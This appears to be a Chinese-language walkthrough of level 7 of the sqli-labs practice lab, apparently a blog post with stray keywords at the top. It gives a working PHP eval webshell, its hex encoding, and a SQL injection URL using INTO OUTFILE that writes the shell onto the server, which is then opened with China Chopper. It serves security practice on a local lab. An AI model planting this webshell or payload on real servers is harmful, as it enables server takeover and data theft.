destoon 网站搬迁,深圳网络建设公司,建设的招标网站,微网站 微信我们先看一下第七关 页面显示use outfile意思是利用文件上传来做 outfile是将检索到的数据#xff0c;保存到服务器的文件内#xff1a; 格式#xff1a;select * into outfile 文件地址 示例#xff1a; mysql select * into outfile f:/mysql/test/one f…我们先看一下第七关 页面显示use outfile意思是利用文件上传来做 outfile是将检索到的数据保存到服务器的文件内 格式select * into outfile 文件地址 示例 mysql select * into outfile f:/mysql/test/one from teacher_class; secure_file_priv参数用于限制LOAD DATA, SELECT …OUTFILE, LOAD_FILE()传到哪个指定目录。secure_file_priv 为 NULL 时表示限制mysqld不允许导入或导出。 secure_file_priv 为 /tmp 时表示限制mysqld只能在/tmp目录中执行导入导出; secure_file_priv 没有值时表示不限制mysqld在任意目录的导入导出 修改之后重启mysql,再查看一下就是空值
当输入时报错 通过url上传一句话木马,用webshell连接工具连接(这里我用的是中国菜刀)
1.123就是连接密码
?php eval($_POST[123]);?
2.3c3f70687020406576616c28245f504f53545b27313233275d293b3f3e是上边一句话木马的hex编码,into outfile指定在七关目录(目录写自己的)下创建2.php文件,文件内容就是刚上传的一句话木马 登录mysql查询secure_file_priv是否为空show global variables like secure%; #查询secure_file_priv 当 secure_file_priv 的值为 NULL 表示限制 mysqld 不允许导入|导出 当 secure_file_priv 的值为 /tmp/ 表示限制 mysqld 的导入|导出只能发生在 /tmp/目录下 当 secure_file_priv 的值没有具体值时表示不对 mysqld 的导入|导出做限制http://127.0.0.1/sqli-labs-php7-master/Less-7/index.php?id-1)) union select 1,0x3c3f70687020406576616c28245f504f53545b27313233275d293b3f3e,3 into outfile D:\phpstudy_x64_8.1.1.3\phpstudy_pro\WWW\sqli-labs-php7-master\Less-7\2.php-- 3.用中国菜刀进行连接,测试连接成功 4.然后就可以访问数据库,从而获得信息 这道题其实出的挺鸡肋你必须满足三个条件才能拿到他的数据库第一就是必须拿到root权限第二个就是 secure_file_priv这个必须不是NULL这道题我这里是自己手动修改了试想一下如果你能修改权限了还看不到里边的信息吗或者你拿到root权限都不一定能修改的第三个就是网站物理路径这个想想办法还是有可能弄到。所以说这道题的条件还是很苛刻
